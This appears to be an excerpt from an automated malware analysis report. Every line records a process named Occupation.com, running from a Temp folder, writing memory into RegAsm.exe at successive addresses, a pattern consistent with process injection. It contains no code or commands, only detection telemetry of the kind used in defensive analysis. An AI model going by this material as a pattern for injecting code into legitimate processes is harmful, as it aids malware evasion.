                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962AF8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962B5C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962BC0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C24
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C88
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962CEC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962D50
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962DB4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E18
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E7C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962EE0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962F44
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962FA8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96300C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963070
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9630D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963138
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96319C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963200
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963264
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9632C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96332C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963390
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9633F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963458
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9634BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963520
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963584
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9635E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96364C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9636B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963714
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963778
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9637DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963840
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9638A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963908
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96396C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9639D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A34
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A98
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963AFC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963B60
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963BC4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C28
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C8C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963CF0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963D54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963DB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963EE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963F48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963FAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964010
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964074
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9640D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96413C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9641A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964204
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964268
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9642CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964330
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964394
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9643F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96445C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9644C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964524
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964588
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9645EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964650
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9646B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964718
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96477C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9647E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964844
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9648A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96490C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964970
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9649D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A38
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A9C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B00
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B64
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964BC8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C2C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C90
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964CF4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964D58
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964DBC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E20
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E84
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964EE8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964F4C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964FB0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965014
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965078
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9650DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965140
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9651A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965208
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96526C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9652D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965334
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965398
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9653FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965460
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9654C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965528
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96558C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9655F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965654
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9656B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96571C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965780
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9657E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965848
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9658AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965910
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965974
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9659D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965A3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965AA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B04
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B68
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965BCC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C30
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C94
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965CF8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965D5C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965DC0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E24
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E88
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965EEC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965F50
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965FB4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966018
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96607C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9660E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966144
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9661A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96620C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966270
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9662D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966338
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96639C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966400
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966464
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9664C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96652C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966590
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9665F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966658
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9666BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966720
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966784
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9667E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96684C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9668B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966914
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966978
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9669DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966A40
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966AA4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966B08
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966B6C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966BD0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966C34
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966C98
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966CFC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966D60
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966DC4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966E28
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966E8C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966EF0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966F54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966FB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96701C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967080
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9670E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967148
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9671AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967210
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967274
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9672D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96733C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9673A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967404
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967468
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9674CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967530
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967594
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9675F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96765C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9676C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967724
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967788
